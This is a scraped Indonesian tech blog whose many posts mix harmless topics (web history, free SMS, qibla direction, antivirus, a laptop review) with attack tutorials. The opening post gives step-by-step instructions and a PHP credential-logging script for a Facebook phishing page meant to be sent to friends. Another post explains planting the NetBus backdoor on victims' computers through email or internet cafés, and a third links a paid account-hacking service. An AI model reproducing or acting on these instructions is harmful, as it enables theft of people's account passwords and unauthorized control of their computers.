6
How to Hack Facebook..???

Learn to hack facebook passwords


Are you curious to
"hack facebook password" well then this post is just for you,Most people ask me to tell us the easiest way to hack facebook password,so here are some ways to hack facebook password:

1.Facebook phishing
2.Keylogging
3.Facebook new features
4.virus


But i will explan you the method which has a great success


Update:Due to recent complains i have elobrated the post and change the login script to hack facebook password please check it out


Today we will focus on the But i will explan you the method which has a great success rate and is very easy to use i.e Phishing or fake login page

Fake login page

A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.

hack facebook password
PROCEDURE:


First of all download facebook fake login page:

1.once you have downloded facebook fake login page now extract contents in a folder

2.In that ,find (CTRL+F) 'http://ujie-caprone.blogspot.com/' then change it to your destined URL."http://ujie-caprone.blogspot.com/" is the redirection url,When victim will enter his/her email and password he will redirected to the site which you will enter instead of "http://ujie-caprone.blogspot.com/"


Now Save it .

3.Open Fake page in wordpad


4.Now press ctrl+F and search for the term "action=" now change its value to pass.php i.e. action=pass.php


5.Create an id in
www.110mb.com,www.ripway.com or t35.com


6.Then upload the contents into a directory


7.For that,after creating an id you should go to file manager and upload all these files.


8.Then just got to Facebook.htm and try out whether its working .

After you type the file , a password file named pass.txt will be created in the same directory .

you can see what username and password you have entered.



9.
Distribute the Facebook.HTML URL (ie: yoursite.com/Facebook.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.


Update:I have found another working php script you can also try this


header("Location: http://WEBSITE ");

$handle =



fopen("pass.txt", "a");

foreach($_GET as



$variable => $value) {


fwrite($handle,



$variable);

fwrite($handle, "=");



fwrite($handle, $value);

fwrite($handle,



"\r\n");

}


fwrite($handle, "\r\n");

fclose($handle);

exit;



In this way you can
Hack a facebook password



Warning:This tutorial "How to hack facebook password " is for educational purposes


Technorati Tags: , , , ,

2
Menjahili Orang Lain Dengan Netbus

NetBus merupakan backdoor yang berjalan di sistem operasi Windows 9x dan NT. Dengan Netbus tersebut banyak hal menyenangkan yang bisa Anda lakukan, diantaranya adalah:



  • Membuka dan menutup CD-ROM Drive.

  • Melakukan shut down, log off, reboot dan power off.

  • Mengontrol gerakan mouse dan keyboard.

  • Menutup program.

  • Mengirimkan pesan atau text.

  • Memata-matai komputer ”korban”.

  • Mengarahkan komputer ”korban” sehingga membuka URL tertentu.

Untuk menjalankan NetBus dibutuhkan 2 buah file, yaitu NetBus.exe dan Patch.exe (tapi nama file tersebut bisa saja diganti dengan nama yang lain). NetBus.exe merupakan file yang diletakkan di komputer kita, sedangkan Patch.exe diletakkan di komputer ”korban”.

Ada beberapa cara untuk ”menanam” file Patch.exe di komputer ”korban”. Misalnya dengan mengirimkan sebagai attachment saat Anda mengirim email. Jika penerima email tersebut mengeksekusi file Patch.exe maka file tersebut akan ter-copy ke directory Windows ( pada komputer ”korban”). Cara lain adalah (ini yang lebih asyik) letakkan file tersebut di semua komputer pada suatu warnet.

Jika berhasil Anda tinggal jalankan file NetBus.exe. Pada kolom Host name/IP Address isi dengan host name/ip address pada komputer si ”korban”. Kalau Anda bingung, gunakan fasilitas Scan yang akan memeriksa komputer mana saja yang telah terdapat file Patch.exe. Selesai mengisi ip address klik tombol Connect. Tunggu beberapa saat. Jika koneksi berhasil tombol Connect akan berganti menjadi tombol Cancel dan setelah itu Anda bisa melakukan apa yang Anda sukai, termasuk menyadap password email orang lain.

Untuk mendapatkan NetBus Anda bisa mendownloadnya dari HackersClub.


Peringatan:

Gunakan artikel ini untuk menambah pengetahuan Anda. Jangan melakukan hal-hal yang dapat merugikan orang lain.

0
Mengenal Sejarah World Wide Web

World wide web mendapat perhatian publik yang sangat besar yang tidak dapat disamai oleh aplikasi internet lainnya. Pada tahun 1995, www menggantikan FTP sebagai aplikasi internet yang bertanggungjawab atas sebagian besar lalu lintas internet. Web telah menjadi sedemikian terkenalnya sehingga kadang dicampuradukkan dengan istilah internet itu sendiri meskipun pengertian ”di Web” dan ”di Inetrnet” sebenarnya tidaklah sama.


Web adalah sistem pengiriman dokumen tersebar yang berjalan di internet. Web dikembangkan di CERN (European Center for Nuclear Research), suatu lembaga bagi penelitian fisika energi tinggi di Geneva, Swiss. Tujuan semula dari lembaga ini adalah untuk membantu para fisikawan di berbagai lokasi yang berbeda dalam bekerja sama dan berbagi material penelitian.


Web dengan cepat berkembang ke luar lingkup masyarakat fisika energi tinggi. Pada tahun 1993, terdapat 130 server web di internet. Setahun kemudian jumlahnya meningkat menjadi 2.738, dan pada bulan Juni 1995 terdapat 23.500 server web.


Sekarang ini web telah memiliki pemirsa dalam jumlah yang sangat besar di luar lingkup akademis : kurang lebih 30% dari server web yang tengah beroperasi saat ini berada di komputer dalam domain komersial, dan di sebagian industri, di mana keberadaaan perusahaan web sama pentingnya dengan memiliki telpon atau faks bagi tujuan komunikasi bisnis. Web sekarang telah menjadi media yang sangat penting bagi periklanan dan alamat web sekarang sudah umum dijumpai pada majalah, surat kabar, dan iklan televisi.

0
Menangkap Tampilan Web Dengan Screengrab

Untuk menangkap tampilan layar Anda pasti sudah biasa menggunakan tombol Print Screen. Untuk menangkap tampilan web Anda mungkin juga menggunakan tombol tersebut. Tapi bagaimana jika Anda ingin menangkap tampilan web secara utuh walaupun web tersebut punya halaman yg cukup panjang?

Untuk melakukan itu Anda bisa menggunakan Screengrab. Screengrab adalah plugin Firefox

yang dapat digunakan untuk menangkap tampilan web. Tidak seperti tombol Print Screen yang hanya menangkap tampilan layar yang ”nampak” saja, Screengrab juga bisa digunakan untuk menangkap tampilan web yang ”tidak nampak” alias halaman web yang panjang.

Anda dapat mendownload Screengrab di: https://addons.mozilla.org/en-US/firefox/addon/1146

Untuk menggunakan plugin tersebut, klik kanan pada halaman web yang ingin Anda tangkap tampilannya, lalu klik menu Screengrab - Save. Ada tiga pilihan, yaitu Complete Page/Frame, Visible portion, dan Selection. Hasil tangkapan tersebut berupa file JPG atau PNG (tergantung pilihan yang Anda pilih pada menu Option).

1
SMS Gratis via Internet

Semakin berkembangnya teknologi proses komunikasi antar orang pun semakin praktis. Komunikasi menggunakan pesan singkat (SMS) masih menjadi pilihan utama saat ini. Sekarang ini sudah banyak tersedia layanan SMS murah dari berbagai operator selular. Di samping itu juga telah tersedia layanan SMS gratis via internet yang dapat dimanfaatkan. Dengan adanya layanan sms bebas ini, kita dapat berkirim SMS (short message service) kepada orang lain tanpa menggunakan pulsa bahkan handphone sekalipun.

Layanan SMS gratis yang tersedia dalam berbagai jenis: ada yang mengharuskan kita menginstall aplikasi terlebih dahulu di ponsel, dan banyak juga tanpa perantaraan ponsel yaitu melalui internet atau bisa juga lewat ponsel tapi melalui fasilitas internet yang sudah tersedia di hampir setiap ponsel keluaran terbaru maupun lama. Layanan sms ini sebelumnya hanya sebatas menggunakan jaringan gprs, namun saat ini sudah berkembang lagi ke semua pengguna ponsel GSM dan CDMA.

Langsung saja ke topik bahasan kita mengenai sms gratis via gprs. Yang akan diuraikan berikut ini adalah layanan sms gratis lewat internet yang dapat digunakan oleh ponsel minimal sudah memiliki fitur GPRS, yang sudah bisa 3G, 3,5G sangat bagus tapi masih banyak wilayah yang belum bisa mengakses layanan 3G dan 3,5G saat ini. Jadi, cukup dengan bermodalkan ponsel yang bisa akses layanan GPRS saja sudah cukup. Layan free sms berikut ini ada yang perlu registrasi dan tanpa registrasi terlebih dahulu.

SMS Gratis tanpa Registrasi:

Pada layanan sms ini, kita hanya perlu mengakses halaman website/wapsite tersebut kemudian mengisi nomor tujuan beserta pesan kemudian langsung mengirim pesan tadi ke semua nomor operator baik GSM maupun CDMA di mana nomor tujuan tanpa perlu bisa akses GPRS. Di sini saya akan membagikan 2 link layanan sms yang dapat digunakan, yaitu: http://freesms4us.com dan http://free.20sms.info. Layanan ini bisa digunakan untuk mengirim sms berkali-kali kapan saja dan di mana saja, proses pengiriman pun sangat cepat layaknya sms biasa dan dapat menuju ke semua nomor (Simpati, As, Mentari, Im3, XL, Axis, Flexi, Starone). Namun, nomor yang mengirim ke sms ke tujuan adalah bukan nomor kita, tapi nomor pusat dari layanan ini.

Untuk layanan di http://free.20sms.info hanya bisa mengirim sms 1 kali setiap 30 menit pada alamat IP yang sama dan http://freesms4us.com satu sms setiap 10 menit. Anda tidak perlu berkecil hati terlebih dahulu, karena kita dapat memanfaatkan layanan ini berkali-kali dan setiap menit dengan syarat IP Address harus diganti. Saya tidak akan bicarakan di sini cara mengganti alamat IP, silakan dicari sendiri. Atau silakan isi kolom komentar, nanti saya akan berikan jawabannya.

Jika Anda merasa tertolong dan ingin memberikan donasi, jangan lupa klik iklan yang ditampilkan di situsnya, sebagai donasi kita agar layanan ini bisa bertahan lebih lama :)

SMS Gratis Registrasi

Layanan sms berikut ini mengharus kita untuk mendaftarkan nomor ponsel kita terlebih dahulu, karena nanti nomor ini akan menjadi nomor pengirim ke nomor tujuan sms nantinya. Layanan tersebut datang dari http://mjoy.com, silakan buka wapsite tersebut. Untuk pertama kali lakukan registrasi dari tombol Join dengan mengisi Asal Negara dan Nomor Ponsel dan Kode Pengaman yang ditampilkan. Selanjutnya kita akan mendapatkan SMS konfirmasi, klik link yang dikirimkan atau copy pastekan ke browser ponsel Anda. Selanjutnya kita diwajibkan untuk mengisi username dan password yang akan digunakan untuk masuk (login) ke layanan ini. Setelah berhasil ikuti langkah selanjutnya dengan memilih ‘new sms’, silakan masukkan nomor tujuan dan pesan tekan tombol submit dan pesan Anda akan terkirim ke nomor tujuan dengan nomor pengirim Anda sendiri yang dimasukkan ketika registrasi tadi.

Layanan sms di mjoy.com ini, dibatasi hanya untuk 5 lima SMS setiap hari bagi pengguna yang belum registrasi. Bila ingin mendapatkan sms yang lebih banyak dalam satu hari kita harus mengklik iklan yang ditampilkan. Namun, setelah saya coba tetap belum ada peningkatan jumlah SMS, saya sudah terlanjur mengklik iklan dan teregistrasi dengan iklan pulsa sudah terpotong. Tapi, bila Anda sudah bisa caranya silakan share di sini. Sebaiknya gunakan 5 sms seperlunya saja, bila ingin lebih gunakan saja layanan di atas tanpa registrasi. Fitur yang disediakan di mjoy.com sudah begitu lengkap dengan adanya fasilitas menyimpan kontak dengan nama dan nomor serta foto, dan sms yang dikirim pun akan tersimpan.

2
Ziddu Terbukti Membayar

Tempat menyimpan file (file hosting) berupa software, video, foto, secara online dan gratis, sekarang telah banyak tersedia salah satunya adalah Ziddu. Saya sering juga menyimpan file di Ziddu untuk mengurangi penggunaan bandwidth hosting. Namun, jika file yang kita simpan di Ziddu ada yang mendownloadnya, maka kita akan mendapat recehan dollar. Semakin banyak yang mendownload akan menambah receh-receh dollar tentunya.

Saya sih belum pernah menerima uang tersebut karena baru saja memulai di ziddu. Nah jika teman semua berminat untuk menyimpan filenya di ziddu berupa FOto, Lagu maupun video dll Kita akan dibayar jika file kita didownload oleh alamat IP yang berbeda, jadi satu alamat IP dalam 1 hari hanya 1 kali bisa menyumbang receh walaupun mendownload pada hari yang sama berkali-kali.

Jika Anda ingin mencoba menyimpan file di internet secara gratis dengan ruang penyimpanan yang tidak terbatas, namun hanya dibatasi maksimal per upload 200 MB. Silakan mendaftar di Ziddu untuk membuat akun terlebih dahulu agar bisa menghasilkan. Selamat mencoba.



10
Membuat Kotak Komentar di Blogger

Mungkin berguna banget buat para pengguna blogger maupun pengunjung untuk memiliki kotak komen sendiri dan untuk mengkomentari seperti yang ada di blog wordpress. Karena dengan hanya tersedia link "Posting sebuah Komentar" di blogger, pengunjung kebanyakan enggan memberikan komentar. Untuk itu akan saya beri tahu cara yang mudah untuk memiliki kotak komen pada blog Anda yang dihosting pada blogspot. Caranya:

1. Buka http://draft.blogger.com dan login dengan akun blogger Anda
2. Klik "Tata Letak"
3. buka "Edit HTML"
4. Beri tanda centang kotak "Expand Template Widget" dengan mengkliknya
5. temukan kode di bawah ini



6. masukkan kode di bawah ini dibawah kode tadi



7. Klik "Simpan Template"
8. Klik tab "Pengaturan"
9. Klik tab "Komentar"
10. Pada bagian "Penempatan Formulir Komentar" pilih "Disemat di bawah entri"
11. Klik "Simpan Pengaturan"

6
Meng-Hack Facebook


Mungkin ini bukan hal baru dan mungkin juga diantara anda sudah menggunakan software ini. Bahkan tidak menutup kemunkinan anda adalah pembuat software ini. Saya menulis artikel ini hanya untuk melengkapi artikel yang sudah ada dan sekedar berbagi informasi sesama penggemar facebook. Silakan search di google, anda akan mendapatkan ribuan artikel sejenis. Tapi saya rasa artikel-artikel tersebut belum ada cara penanganan yang sip!.

Nah, gak usah panjang lebar karena disini anda akan saya tunjuk situs langsung yang bisa membantu anda mengetahui Email dan Password FB yang ingin anda Hack...

Yang penting disini anda harus Register Gratis dan jangan lupa isi saldo akun anda menggunakan beberapa akun bank yang terdaftar disana, atau kalau mau mudah silakan gunakan kartu kredit anda...

ID Facebook maksudnya disini, ketika anda membuka Profil akun facebook calon yang mau anda hacker.. Trus liat di Addres Browser anda
Misal http://www.facebook.com/profile.php?id=100000425059393455

Nah, ID itu angka yang saya beri warna biru tersebut...

Langsung aja ya anda menuju tempat Hacking Facebook tersebut... KLIK DISINI

0
Cara Mencari Arah Kiblat


Arah kiblat menjadi prasyarat menjalankan ibadah shalat. Di mana pun umat Islam menjalankan ritual keagamaan itu, mereka harus berkiblat ke Kabah di Mekkah. Penentuan arah kiblat tentu tak masalah bagi mereka yang berada di dekat Kabah. Bagaimana memastikannya jika berada jauh dari tempat suci itu?

Beberapa waktu lalu di internet muncul tulisan Usep Fathudin, mantan Staf Khusus Menteri Agama, yang mengungkap beragam arah kiblat masjid-masjid di Jakarta. Kesahihan kiblat suatu masjid, menurutnya, perlu dicapai sebelum masjid dibangun. Hal itu karena pergeseran 1 sentimeter saja bisa berarti 100 kilometer penyimpangan jaraknya.

Meskipun begitu, menurutnya, akurasi arah kiblat 100 persen memang tidak diwajibkan dalam shalat, seperti tersebut dalam Al Quran Surat Al Baqarah ayat 144, yang memerintahkan untuk shalat ke arah kiblat. ”Kata-kata ’ke arah’ ditafsirkan sebagai usaha maksimal mengarahkan shalat kita ke Kabah di Mekkah,” urainya.

Walaupun begitu, upaya untuk mendekati ketepatan arah ke kiblat dapat dilakukan dengan berbagai cara. Usep menyebutkan, penentuan arah kiblat Masjid Al Mukhlishun di Griya Depok Asri, Depok Tengah, yang berdiri tahun 2001, menggunakan suatu kompas kecil berbahasa Inggris, dengan tulisan Latin dan Arab.

Pada alat penunjuk arah itu tertulis bahwa untuk Jakarta dan sebagian besar kota di Indonesia, arah utara jarum kompas harus menunjuk angka 9 sebagai arah kiblat.

Kenyataannya, survei arah kiblat yang dilakukannya di berbagai masjid besar di Jakarta memperlihatkan, kompas yang digunakannya menunjuk arah yang berbeda-beda di tiap tempat ibadah itu, berkisar dari 7,5 hingga 9.

Penentuan arah kiblat yang dipakai umumnya mengacu pada arah utara geografis sebenarnya, yang memakai arah kompas atau jarum magnetik yang disebut ”pencari arah Kabah”. Arah jarum magnetik di kompas mengarah berdasarkan kutub magnetik Bumi di kutub utara.

Ternyata arah utara magnetik Bumi itu berbeda di tiap kota dari waktu ke waktu. Hal ini dipengaruhi oleh rotasi Bumi. Penelitian menunjukkan arah utara magnetik terus bergeser sekitar 4,8 kilometer per tahun. Pada tahun 2005 pergeserannya mencapai 800 kilometer dari kutub utara sebenarnya. Pada 2050 diperkirakan utara magnetik Bumi mendekati Siberia.

Qibla Locator

Penggunaan kompas sebagai penunjuk arah kiblat belakangan memang dianggap kurang akurat. Belakangan diperkenalkan peranti lunak Qibla Locator yang termuat dalam situs web http://www.qiblalocator.com.

Qibla Locator atau penunjuk arah kiblat antara lain dirancang oleh Ibn Mas’ud dengan menggunakan peranti lunak aplikasi Google Maps API v2, sejak tahun 2006. Pengembangan tampilan dan aplikasinya kemudian melibatkan Hamed Zarrabi Zadeh dari Universitas Waterloo di Ontario, Kanada.

Pada Qibla Locator versi Beta seri 0.8.7 itu dilengkapi dengan geocoding dari Yahoo, pengontrol arah pada citra peta, dan indikator tingkat pembesaran. Hingga September 2007 dihasilkan empat versi Beta dengan beberapa aplikasi tambahan, Geocoder, dan tampilan jarak.

Dengan Qibla Locator yang berbasis Google Earth ini dapat diketahui arah kiblat dari mana pun kita berada. Untuk mengetahuinya, di bagian atas situs itu ada kotak untuk memasukkan lokasi, alamat atau nama jalan, kode pos, dan negara atau garis lintang dan garis bujur.

Maka di sisi kanan gambar peta akan muncul besaran arah kiblat atau kabah dan jaraknya dari posisi lokasi yang kita masukkan. Peranti lunak ini, menurut Thomas Djamaluddin, Kepala Pusat Pemanfaatan Sains Atmosfer dan Iklim Lembaga Penerbangan dan Antariksa Nasional (Lapan) sangat membantu guna mengecek arah kiblat secara akurat. ”Ini bisa untuk koreksi massal masjid-masjid di Indonesia,” katanya.

Bayangan matahari

Thomas, pakar astronomi dan astrofisika, mengemukakan bahwa ada penentuan arah kiblat yang menggunakan bayangan Matahari. Sekitar tanggal 26-30 Mei pukul 16.18 WIB dan 13-17 Juli pukul 16.27 WIB Matahari tepat berada di atas kota Mekkah.

Pada saat itu Matahari yang tampak dari semua penjuru Bumi dapat dijadikan penunjuk lokasi Kabah. Begitu pula bayangan benda tegak pada waktu itu juga dapat menjadi menentu arah ke kiblat.

Selain itu untuk daerah yang tidak mengalami siang, sama dengan Mekkah, waktu yang digunakan adalah saat Matahari di atas titik yang diametral dengan Mekkah. Waktu yang dapat dijadikan patokan penunjuk kiblat untuk wilayah tersebut adalah Matahari pada tanggal 12 hingga 16 Januari pukul 04.30 WIB dan 27 November hingga 1 Desember pukul 04.09 WIB.

Cara ini menurutnya paling mudah untuk mengoreksi arah kiblat, termasuk untuk garis saf di dalam masjid. Begitu mudah sehingga orang awam pun dapat melakukannya.

3
AVI+Clamav: Tangkal Puluhan Ribu Serangan


Salah satu kelebihan AVI adalah pada keberadaan pengaya (plugin). Berkat fasilitas ini, kemampuan AVI dapat ditingkatkan dengan mudah. Salah satu pengaya terbaru yang dimiliki AVI adalah Clamsav. Ini adalah pengaya yang mengintegrasikan database Clamav ke dalam database AVI. Dengan begitu, AVI kini dapat menangkal puluhan ribu jenis serangan, baik lokal maupun internasional. Salah satu yang membuat sebuah antivirus hebat dalam mendeteksi virus-virus komputer adalah jumlah definisi ancaman yang dimilikinya. Semakin banyak definisi, semakin baik antivirus tersebut dalam menghadang berbagai macam ancaman yang mencoba masuk ke dalam komputer. 

AVI merupakan salah satu antivirus lokal yang memiliki jumlah definisi ancaman yang terbatas. Selama ini, database AVI lebih banyak berisi virus-virus lokal. Keterbatasan ini disebabkan karena jumlah virus baru yang dilaporkan pengguna AVI hanya berkisar dari Indonesia saja. Inilah mengapa banyak orang menganggap antivirus lokal hanya ampuh untuk mengatasi virus lokal saja.

Begitu pula sebaliknya, antivirus luar hanya ampuh mengatasi virus luar saja. Berdasarkan fakta tersebut, banyak orang yang akhirnya memasang dua antivirus sekaligus: satu antivirus lokal, satu lagi antivirus luar. 

Namun AVI memiliki solusi cerdas untuk mengatasi hal tersebut. Kini AVI memiliki pengaya (plugin)baru yang mengintegrasikan AVI dengan engine antivirus Clamav. Apa itu Clamav? Clamav adalah antivirus yang dikembangkan oleh pengembang dari komunitas open sourcehttp://www.clamav.net berlisensi GPL (General Public License). Anda bisa bisa mendapatkan informasi lebih lengkap mengenai Clamav pada situs resminya . Saat ini jumlah definisi ancaman yang dapat dikenali Clamav kurang lebih 49 ribu ancaman yang kebanyakan didominasi oleh virus-virus luar. Nah, dengan menggabungkan database asli AVI dan Clamav, AVI kini mampu mengenali kurang lebih 50 ribu ancaman!

0
Zyrex Sky 2712 : Menggapai Angkasa


Jika ditelusuri, Zyrex adalah satu dari sedikit pabrikan lokal yang memiliki visi jauh ke depan. Tiga tahun lalu, jauh sebelum netbook populer seperti sekarang, Zyrex adalah salah satu yang pertama menghadirkan netbook di pasaran Indonesia. Kini, ketika notebook tipis mulai menjadi tren, Zyrex pun dengan sigap langsung menghadirkan lini produk Sky. Sky adalah notebook yang memiliki desain tipis dan ringan serta dibandrol dengan harga yang terjangkau. Jadi dari sisi segmentasi, notebook ini sekelas dengan Acer Aspire Timeline dan HP Pavilion dv2 (InfoKomputer Juni 2009).
Ada dua produk yang mengisi lini produk Sky, salah satunya adalah Sky 2712 yang kami uji kali ini. Yang menarik, Sky 2712 ini hadir dalam ukuran layar yang tidak biasa, yaitu 11,6 inci. Resolusinya juga mendukung true widescreen (16:9), yaitu 1366x768 pixel. Meski memadukan ukuran layar yang relatif kecil dan resolusi tinggi, notebook ini tetap memberikan gambar yang nyaman di mata. Ukuran icon dan fontWindows memang terlihat sedikit lebih kecil, namun tidak membuat mata kami yang sudah menua ini merasa terganggu.
Bahu dan tangan kami yang mudah pegal pun tidak “menjerit” karena Sky 2712 sangat ringan. Jika dihitung, bobotnya hanya 1,2 kg. Jika ditambah adaptor pun, berat totalnya cuma sekitar 1,5 kg. Selain ringan, Sky 2712 pun sangat tipis dengan tebal tidak lebih dari 2,2 cm  pada kondisi tertutup.
Namun ketipisan notebook ini memang ada konsekuensinya. Pertama adalah perangkat optik bersifat eksternal. Kedua, fasilitas VGA Out dan Ethernet harus menggunakan kabel ekstensi khusus. Kekurangan kedua ini terbilang sangat mengganggu mengingat VGA-Out banyak digunakan untuk kebutuhan presentasi, sementara Ethernet sering digunakan di kamar hotel untuk terkoneksi ke internet. Terbayang repotnya jika kabel ekstensi tersebut hilang atau tertinggal di rumah.
Selain soal tipis, notebook ini juga mengikuti tren dalam hal desain keyboard. Jika memperhatikan foto di bawah, Anda akan melihat desain tombol keyboard-nya yang bulat dan memiliki jarak signifikan dengan tombol sebelahnya; mirip seperti permen Chiclets. Selain terlihat lebih cantik, desain ini membuat kegiatan mengetik terasa nyaman. Kami tetap bisa mencapai kecepatan ketik standar kami meski sebenarnya ukuran tombol relatif kecil (14x14 mm untuk tombol utama dan 11x9 mm untuk tombol Function).
Sama seperti Acer Timeline, Zyrex Sky juga menggunakan prosesor Intel tipe CULV (Customer Ultra Low Voltage). Prosesor yang digunakan Sky 2712 adalah Intel Core 2 Solo U2700 yang memiliki kecepatan 1,3GHz. Dibantu memori 1GB, prosesor ini memiliki performa di atas netbook, meski tetap di bawah Acer Timeline 4810T yang menggunakan prosesor Intel CULV yang lebih cepat (lihat tabel).
Untuk durasi pada mode baterai, notebook ini memiliki nafas yang biasa saja. Maklum, ukuran baterainya cuma 3400 mAh. Saat memutar video HD, catatan waktunya sekitar 1 jam 45 menit saja. Mengingat Zyrex Sky merupakan notebook ringan dan mudah dibawa-bawa, kami sebenarnya mengharapkan durasi yang lebih lama lagi. Supaya tetap bisa digunakan meski jauh dari sumber listrik, maksudnya.
***
Meski tidak sempurna, Zyrex Sky 2712 mampu membuat kami jatuh cinta. Dengan bobot yang nyaris setara ringannya, Sky 2712 memberikan area pandang dan performa di atas netbook. Apalagi, harganya juga tergolong “ringan”, yaitu Rp. 6 juta (tanpa sistem operasi). Kalau saja durasi baterainya lebih lama, notebook ini bisa menemani Anda ke mana saja. 
 
Ujie Caprone | © 2011 Blogger Template by Ujiecaprone.com